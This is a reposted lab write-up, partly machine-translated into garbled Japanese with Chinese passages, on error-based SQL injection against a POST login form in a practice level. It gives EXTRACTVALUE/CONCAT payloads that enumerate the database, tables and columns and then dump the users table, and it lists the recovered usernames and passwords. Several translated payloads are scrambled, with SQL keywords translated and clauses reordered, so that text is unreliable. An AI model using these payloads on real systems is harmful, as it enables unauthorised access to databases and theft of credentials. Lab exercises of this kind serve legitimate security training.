以下(13)POST - ダブルインジェクション - シングルquotes-文字列-twist(POST単一引用符は二重の注入を修正)

1.なしログインに成功リターン情報を見つけ、ブラインドのようです

  

 

 2.エラータイプ:EXTRACTVALUE()

  (1)爆库:のuname =管理者 ')とEXTRACTVALUE(1、CONCAT(0x7eの、(選択データベース())))と(' &passwdの=管理&提出=送信

    

  (2)爆表:のuname =&passwdの=管理&提出=サブミット ')と((TABLE_SCHEMA =データベース())INFORMATION_SCHEMA.TABLESから1、CONCAT(0x7eの、(選択GROUP_CONCAT(TABLE_NAME)))とEXTRACTVALUEにadmin

      

  (3)爆列名:のuname =管理者 ')及び(TABLE_NAME = information_schema.columnsから1、CONCAT(0x7eの、(選択GROUP_CONCAT(COLUMN_NAME)EXTRACTVALUE' &passwdの=管理&提出=送信ユーザー ')とは、())'

    

 

     因为没有咱们需要的password,username,把一些不需要的列名消除掉:uname=admin') and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and column_name not in('user_id','first_name','last_name','user','avatar','last_login','failed_login'))))  and (' &passwd=admin&submit=Submit

    

 

     我们发现后面确实有咱们需要的password,username

  (4)爆值:uname=admin') and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users)))   and (' &passwd=admin&submit=Submit

    

 

     通过 not in(),我们可以找到所有的用户名和密码:、

    Dumb:Dumb    Angelinal:I-kill-you   Dummy:p@ssword   secure:crappy   stupid:stupidiry   superman:genious   batman:mob!le   admin:admin   admin1:admin1   admin2:admin2   admin3:admin3   dhakkan:dumbo   admin4:admin4

3.时间型盲注

  这种方法有点费时间,这个参照之前的;

  

おすすめ

転載: www.cnblogs.com/meng-yu37/p/12296172.html